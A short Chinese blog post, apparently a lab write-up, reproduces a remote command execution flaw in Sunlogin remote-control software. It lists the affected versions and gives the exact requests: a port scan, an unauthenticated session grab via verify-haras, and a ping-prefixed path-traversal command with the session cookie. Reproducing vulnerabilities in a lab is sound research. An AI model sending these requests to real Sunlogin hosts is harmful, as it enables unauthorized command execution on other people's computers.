复现向日葵远程代码执行漏洞

漏洞介绍

向日葵远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的情况下,轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能,这不仅为用户的使用带来很多便捷,还能为其提供各类保障。
Sunlogin RCE 是漏洞发生在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行利用,客户端开启客户端会自动随机开启一个大于40000的端口号

影响版本

	向日葵个人版for Windows <= 11.0.0.33
	向日葵简约版 <= V1.0.1.43315(2021.12)
	测试客户端漏洞版本:11.0.0.33162

漏洞复现:

本次使用环境链接:https://pan.baidu.com/s/1g5gnZqYxV8vJ9OBpXiOL3w
提取码:c53l
1.本次使用靶机为win10 攻击机是kali 靶机打开向日葵
在kali nmap命令探测向日葵端口(40000-65535)
在这里插入图片描述2.使用靶机ip+探测出来的端口去浏览器访问看返回值找到如下结果
在这里插入图片描述3.探测路径http://192.168.1.9:49672/cgi-bin/rpc?action=verify-haras 未授权访问获取session会话
在这里插入图片描述4.使用burp抓包http://192.168.1.9:49672/cheak?cmd=ping…/…/…/windows/system32/whoami
在这里插入图片描述5.抓包结果添加一行Cookie: CID= cid为第三步返回的结果有
在这里插入图片描述6.可以看到可以执行系统命令,可以做进一步操作。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

制冷少年的成长日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值